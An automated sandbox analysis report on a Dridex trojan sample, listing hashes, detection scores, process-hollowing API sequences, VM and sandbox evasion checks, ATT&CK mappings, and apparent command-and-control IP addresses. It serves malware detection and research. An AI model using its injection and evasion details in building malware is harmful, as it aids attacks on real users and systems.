Analysis Report Dridex

Overview

General Information

Sample Name: Dridex (renamed file extension from none to exe)
Analysis ID: 393200
MD5: 6e5654da58c03df6808466f0197207ed
SHA1: 594f33ad9d7f85625a88c24903243ba9788fba86
SHA256: e30b76f9454a5fd3d11b5792ff93e56c52bf5dfba6ab375c3b96e17af562f5fc
Tags: Dridex, ProcessHollowing, RunPE

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Contain functionality to detect virtual machines
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Program does not show much activity (idle)
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • Dridex.exe (PID: 6616 cmdline: 'C:\Users\user\Desktop\Dridex.exe' MD5: 6E5654DA58C03DF6808466F0197207ED)
    • Dridex.exe (PID: 6660 cmdline: C:\Users\user\Desktop\Dridex.exe MD5: 6E5654DA58C03DF6808466F0197207ED)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Dridex.exe, Avira: detected
Multi AV Scanner detection for submitted file
Source: Dridex.exe, Metadefender: Detection: 86%
Source: Dridex.exe, ReversingLabs: Detection: 100%
Machine Learning detection for sample
Source: Dridex.exe, Joe Sandbox ML: detected
Source: 0.2.Dridex.exe.28a0000.7.unpack, Avira: Label: TR/Taranis.403
Source: 0.0.Dridex.exe.400000.0.unpack, Avira: Label: TR/Taranis.403
Source: 0.2.Dridex.exe.2470000.6.unpack, Avira: Label: TR/Taranis.403
Source: 1.0.Dridex.exe.400000.0.unpack, Avira: Label: TR/Taranis.403
Source: 0.2.Dridex.exe.400000.1.unpack, Avira: Label: TR/Taranis.403
Source: 0.1.Dridex.exe.400000.0.unpack, Avira: Label: TR/Taranis.403
Source: Dridex.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 0_2_00401160 MapViewOfFile,GetLocaleInfoW,FindFirstFileA,MessageBoxIndirectA,RegDeleteKeyW,GetCharABCWidthsFloatA,FindNextFileW,EnableWindow,GetTimeZoneInformation,ExitProcess
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 0_1_00401160 MapViewOfFile,GetLocaleInfoW,FindFirstFileA,RegDeleteKeyW,GetCharABCWidthsFloatA,FindNextFileW,GetTimeZoneInformation,ExitProcess
Source: global traffic, TCP traffic: 192.168.2.6:49710 -> 94.73.155.12:2448
Source: global traffic, TCP traffic: 192.168.2.6:49722 -> 103.252.100.44:4493
Source: global traffic, TCP traffic: 192.168.2.6:49723 -> 89.108.71.148:8843
Source: global traffic, TCP traffic: 192.168.2.6:49725 -> 221.132.35.56:8843
Source: unknown, TCP traffic detected without corresponding DNS query: 94.73.155.12
Source: unknown, TCP traffic detected without corresponding DNS query: 103.252.100.44
Source: unknown, TCP traffic detected without corresponding DNS query: 89.108.71.148
Source: unknown, TCP traffic detected without corresponding DNS query: 221.132.35.56
Source: Dridex.exe, 00000000.00000002.333593653.000000000066A000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 0_2_02370018 LoadLibraryA,CreateProcessW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CreateFileW,TerminateProcess,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,CreateFileW,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc
Source: Dridex.exe, 00000000.00000002.333632084.0000000000BB0000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameuser32j% vs Dridex.exe
Source: Dridex.exe, 00000000.00000002.333620542.0000000000B80000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameMFC42.DLL.MUIR vs Dridex.exe
Source: Dridex.exe, 00000000.00000002.333741586.0000000002470000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamemation.exe vs Dridex.exe
Source: Dridex.exe, 00000001.00000002.594794789.0000000003F50000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Dridex.exe
Source: Dridex.exe, Binary or memory string: OriginalFilenamemation.exe vs Dridex.exe
Source: classification engine, Classification label: mal84.evad.winEXE@3/0@0/4
Source: C:\Users\user\Desktop\Dridex.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Dridex.exe, File read: C:\Users\user\Desktop\Dridex.exe
Source: unknown, Process created: C:\Users\user\Desktop\Dridex.exe 'C:\Users\user\Desktop\Dridex.exe'
Source: C:\Users\user\Desktop\Dridex.exe, Process created: C:\Users\user\Desktop\Dridex.exe C:\Users\user\Desktop\Dridex.exe
Source: Dridex.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Dridex.exe, Unpacked PE file: 1.2.Dridex.exe.400000.0.unpack .text:R;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.data1:W;.reloc:R;
Source: Dridex.exe, Static PE information: real checksum: 0x22e32 should be: 0x2b73e
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 0_2_004025C0 push eax; ret 0_2_004025EE
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 0_2_023740C0 push eax; ret 0_2_023740EE
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 0_1_004025C0 push eax; ret 0_1_004025EE
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_2_00410075 push 4D8A84E3h; retf 1_2_0041007A
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_2_0041009D push 4D8A84E3h; retf 1_2_004100A2
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_2_0041017B push cs; iretd 1_2_0041017E
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_2_004105D4 pushfd ; ret 1_2_004105E5
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_2_004105AF pushfd ; ret 1_2_004105BD
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_2_004101B6 push cs; retf 1_2_004101BE
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_2_00414EDC push edi; ret 1_2_00414EE2
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_1_00410075 push 4D8A84E3h; retf 1_1_0041007A
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_1_0041009D push 4D8A84E3h; retf 1_1_004100A2
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_1_0041017B push cs; iretd 1_1_0041017E
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_1_004105D4 pushfd ; ret 1_1_004105E5
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_1_004105AF pushfd ; ret 1_1_004105BD
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_1_004101B6 push cs; retf 1_1_004101BE
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_1_00414EDC push edi; ret 1_1_00414EE2
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 0_2_00401C40 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379
Source: C:\Users\user\Desktop\Dridex.exe, Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contain functionality to detect virtual machines
Source: C:\Users\user\Desktop\Dridex.exe, Code function: VBoxService.exe VBoxService.exe VBoxService.exe VBoxService.exe vmtoolsd.exe vmtoolsd.exe 0_2_02370018
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Source: C:\Users\user\Desktop\Dridex.exe, File opened: C:\myapp.exe
Source: C:\Users\user\Desktop\Dridex.exe, Thread delayed: delay time: 325000
Source: C:\Users\user\Desktop\Dridex.exe, Thread delayed: delay time: 293000
Source: C:\Users\user\Desktop\Dridex.exe, TID: 6664, Thread sleep time: -318000s >= -30000s
Source: C:\Users\user\Desktop\Dridex.exe, TID: 6664, Thread sleep time: -167000s >= -30000s
Source: C:\Users\user\Desktop\Dridex.exe, TID: 6664, Thread sleep time: -148000s >= -30000s
Source: C:\Users\user\Desktop\Dridex.exe, TID: 6664, Thread sleep time: -325000s >= -30000s
Source: C:\Users\user\Desktop\Dridex.exe, TID: 6664, Thread sleep time: -155000s >= -30000s
Source: C:\Users\user\Desktop\Dridex.exe, TID: 6664, Thread sleep time: -149000s >= -30000s
Source: C:\Users\user\Desktop\Dridex.exe, TID: 6664, Thread sleep time: -293000s >= -30000s
Source: C:\Users\user\Desktop\Dridex.exe, TID: 6664, Thread sleep time: -169000s >= -30000s
Source: C:\Users\user\Desktop\Dridex.exe, TID: 6664, Thread sleep time: -123000s >= -30000s
Source: C:\Users\user\Desktop\Dridex.exe, TID: 6664, Thread sleep time: -129000s >= -30000s
Source: all processes, Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\Dridex.exe, Last function: Thread delayed
Source: C:\Users\user\Desktop\Dridex.exe, Thread delayed: delay time: 159000
Source: C:\Users\user\Desktop\Dridex.exe, Thread delayed: delay time: 167000
Source: C:\Users\user\Desktop\Dridex.exe, Thread delayed: delay time: 148000
Source: C:\Users\user\Desktop\Dridex.exe, Thread delayed: delay time: 155000
Source: C:\Users\user\Desktop\Dridex.exe, Thread delayed: delay time: 149000
Source: C:\Users\user\Desktop\Dridex.exe, Thread delayed: delay time: 169000
Source: C:\Users\user\Desktop\Dridex.exe, Thread delayed: delay time: 123000
Source: C:\Users\user\Desktop\Dridex.exe, Thread delayed: delay time: 129000
Source: Dridex.exe, Binary or memory string: VBoxService.exe
Source: Dridex.exe, Binary or memory string: vmtoolsd.exe
Source: C:\Users\user\Desktop\Dridex.exe, Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 0_2_02373BD4 push dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_2_0040E874 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 1_1_0040E874 mov eax, dword ptr fs:[00000030h]

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\Dridex.exe, Code function: 0_2_02370018 LoadLibraryA,CreateProcessW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CreateFileW,TerminateProcess,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,CreateFileW,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Dridex.exe, Memory written: C:\Users\user\Desktop\Dridex.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Dridex.exe, Code function: LoadLibraryA,CreateProcessW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CreateFileW,TerminateProcess,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,CreateFileW,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc, explorer.exe.\ 0_2_02370018
Source: C:\Users\user\Desktop\Dridex.exe, Process created: C:\Users\user\Desktop\Dridex.exe C:\Users\user\Desktop\Dridex.exe
Source: Dridex.exe, 00000001.00000002.593513151.0000000002230000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd
Source: Dridex.exe, 00000001.00000002.593513151.0000000002230000.00000002.00000001.sdmp, Binary or memory string: Progman
Source: Dridex.exe, 00000001.00000002.593513151.0000000002230000.00000002.00000001.sdmp, Binary or memory string: &Program Manager
Source: Dridex.exe, 00000001.00000002.593513151.0000000002230000.00000002.00000001.sdmp, Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Dridex.exe, Code function: MapViewOfFile,GetLocaleInfoW,FindFirstFileA,MessageBoxIndirectA,RegDeleteKeyW,GetCharABCWidthsFloatA,FindNextFileW,EnableWindow,GetTimeZoneInformation,ExitProcess, 0_2_00401160
Source: C:\Users\user\Desktop\Dridex.exe, Code function: MapViewOfFile,GetLocaleInfoW,FindFirstFileA,RegDeleteKeyW,GetCharABCWidthsFloatA,FindNextFileW,GetTimeZoneInformation,ExitProcess, 0_1_00401160
Source: C:\Users\user\Desktop\Dridex.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\Desktop\Dridex.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 222 | Virtualization/Sandbox Evasion 221 | Input Capture 1 | System Time Discovery 1 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 222 | LSASS Memory | Security Software Discovery 21 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 1 | Security Account Manager | Virtualization/Sandbox Evasion 221 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing 11 | NTDS | Process Discovery 3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap |  | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | File and Directory Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery 23 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact |

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

| Source | Detection | Scanner | Label |
|---|---|---|---|
| Dridex.exe | 86% | Metadefender |  |
| Dridex.exe | 100% | ReversingLabs | Win32.Backdoor.Drixed |
| Dridex.exe | 100% | Avira | TR/Taranis.403 |
| Dridex.exe | 100% | Joe Sandbox ML |  |

Dropped Files

No Antivirus matches

Unpacked PE Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 0.2.Dridex.exe.28a0000.7.unpack | 100% | Avira | TR/Taranis.403 |
| 0.0.Dridex.exe.400000.0.unpack | 100% | Avira | TR/Taranis.403 |
| 1.2.Dridex.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 0.2.Dridex.exe.2470000.6.unpack | 100% | Avira | TR/Taranis.403 |
| 1.0.Dridex.exe.400000.0.unpack | 100% | Avira | TR/Taranis.403 |
| 0.2.Dridex.exe.400000.1.unpack | 100% | Avira | TR/Taranis.403 |
| 0.1.Dridex.exe.400000.0.unpack | 100% | Avira | TR/Taranis.403 |
| 0.2.Dridex.exe.2380000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
| 1.1.Dridex.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 103.252.100.44 | unknown | Indonesia | 59147 | IDNIC-DRUPADI-AS-IDPTDrupadiPrimaID | false |
| 89.108.71.148 | unknown | Russian Federation | 43146 | AGAVA3RU | false |
| 221.132.35.56 | unknown | Viet Nam | 45899 | VNPT-AS-VNVNPTCorpVN | false |
| 94.73.155.12 | unknown | Turkey | 34619 | CIZGITR | false |

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 393200
Start date: 20.04.2021
Start time: 09:53:06
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 36s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Dridex (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.evad.winEXE@3/0@0/4
EGA Information: Failed
HDC Information:
  • Successful, ratio: 51.4% (good quality ratio 48.9%)
  • Quality average: 76.7%
  • Quality standard deviation: 29%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 25
  • Number of non-executed functions: 20
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/393200/sample/Dridex.exe

Simulations

Behavior and APIs

| Time | Type | Description |
|---|---|---|
| 09:54:22 | API Interceptor | 11x Sleep call for process: Dridex.exe modified |

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.640683635227719
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Dridex.exe
File size: 176128
MD5: 6e5654da58c03df6808466f0197207ed
SHA1: 594f33ad9d7f85625a88c24903243ba9788fba86
SHA256: e30b76f9454a5fd3d11b5792ff93e56c52bf5dfba6ab375c3b96e17af562f5fc
SHA512: 6542a42528f11085376ba893615cd7b68b37e1c78427c678db658e6174ca8d0ac893b071aa55e8d3924a6a2235657322eadf025f10e26c4a0c9858e3c12eb264
SSDEEP: 3072:qZkKstjomW1XBJqhhPQa77l79KQXF6yvf4FkbmB7VU2fMa+:zvUmgqkm9KQXF6yvwCbu7gT
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............B...B...B#..B...B)..Bj..B...B...Bj..B...B...B...BW..B9..B...B...B:..B...BW..Bi..BRich...B................PE..L...b.QV...

File Icon

Icon Hash:c08c6665996135a7

Static PE Info

General

Entrypoint:0x402410
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x5651A962 [Sun Nov 22 11:39:14 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:3c0df6d8c78f9ce11bee326616d075a2

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00403770h
push 00402612h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [00403260h]
pop ecx
or dword ptr [00407128h], FFFFFFFFh
or dword ptr [0040712Ch], FFFFFFFFh
call dword ptr [00403264h]
mov ecx, dword ptr [0040711Ch]
mov dword ptr [eax], ecx
call dword ptr [00403268h]
mov ecx, dword ptr [00407118h]
mov dword ptr [eax], ecx
mov eax, dword ptr [0040326Ch]
mov eax, dword ptr [eax]
mov dword ptr [00407124h], eax
call 00007FF08CC89637h
cmp dword ptr [00406FD0h], ebx
jne 00007FF08CC894AEh
push 0040260Eh
call dword ptr [00403270h]
pop ecx
call 00007FF08CC89609h
push 00405028h
push 00405024h
call 00007FF08CC895F4h
mov eax, dword ptr [00407114h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00407110h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00403278h]
push 00405020h
push 00405000h
call 00007FF08CC895C1h

Rich Headers

Programming Language:
  • [C++] VS2002 (.NET) build 9466
  • [EXP] VC++ 6.0 SP5 build 8804
  • [ASM] VS2002 (.NET) build 9466

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1000 | 0x10 | .text
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3980 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8000 | 0x23e9c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa000 | 0x22 | .rsrc
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3000 | 0x2f0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1850 | 0x2000 | False | 0.381591796875 | data | 4.8857712628 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x3000 | 0x1148 | 0x2000 | False | 0.22705078125 | data | 3.18379463097 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x5000 | 0x2130 | 0x2000 | False | 0.441162109375 | data | 4.29630200062 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x8000 | 0x23e9c | 0x24000 | False | 0.962103949653 | data | 7.93888068706 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL | Import
MFC42.DLL |
MSVCRT.dll | _controlfp, _onexit, __dllonexit, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, _setmbcp, __CxxFrameHandler, strtol, _exit, _XcptFilter, exit
KERNEL32.dll | FindNextFileW, GetTimeZoneInformation, ExitProcess, GetModuleFileNameA, FlushFileBuffers, SetStdHandle, HeapDestroy, FindFirstFileA, HeapReAlloc, GetDateFormatA, GetEnvironmentStrings, GetACP, GetCommandLineA, GetModuleHandleA, GetStartupInfoA, GetLocaleInfoW, CreateFileW, MapViewOfFile, GetOEMCP, CreateFileA, GetModuleFileNameW
USER32.dll | IsIconic, GetCaretBlinkTime, ShowWindow, UpdateWindow, GetCursorPos, PeekMessageW, RegisterClipboardFormatW, GetSystemMetrics, HideCaret, GetSystemMenu, AppendMenuA, SendMessageA, LoadIconA, MessageBoxIndirectA, GetDesktopWindow, DrawIcon, EnableWindow, GetClientRect
GDI32.dll | GetCharABCWidthsFloatA, CreateCompatibleDC
ADVAPI32.dll | RegDeleteKeyW
OLEAUT32.dll | VariantClear

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/20/21-09:53:56.512323 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 205.185.216.42
04/20/21-09:53:56.548392 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 84.17.52.126 | 192.168.2.6
04/20/21-09:53:56.548789 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 205.185.216.42
04/20/21-09:53:56.585493 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 5.56.20.161 | 192.168.2.6
04/20/21-09:53:56.585894 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 205.185.216.42
04/20/21-09:53:56.632458 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 81.95.2.138 | 192.168.2.6
04/20/21-09:53:56.634351 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 205.185.216.42
04/20/21-09:53:56.684778 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 151.139.80.6 | 192.168.2.6
04/20/21-09:53:56.686368 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 205.185.216.42
04/20/21-09:53:56.736294 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 151.139.80.13 | 192.168.2.6
04/20/21-09:53:56.736727 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 205.185.216.42
04/20/21-09:53:56.786580 | ICMP | 408 | ICMP Echo Reply | | | 205.185.216.42 | 192.168.2.6

Network Port Distribution

TCP Packets


Code Manipulations

System Behavior

General

Start time:09:53:56
Start date:20/04/2021
Path:C:\Users\user\Desktop\Dridex.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\Dridex.exe'
Imagebase:0x400000
File size:176128 bytes
MD5 hash:6E5654DA58C03DF6808466F0197207ED
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:09:53:58
Start date:20/04/2021
Path:C:\Users\user\Desktop\Dridex.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Desktop\Dridex.exe
Imagebase:0x400000
File size:176128 bytes
MD5 hash:6E5654DA58C03DF6808466F0197207ED
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Disassembly

Code Analysis

    Executed Functions

    APIs
    • LoadLibraryA.KERNELBASE(psapi.dll,GetProcessMemoryInfo), ref: 0237201C
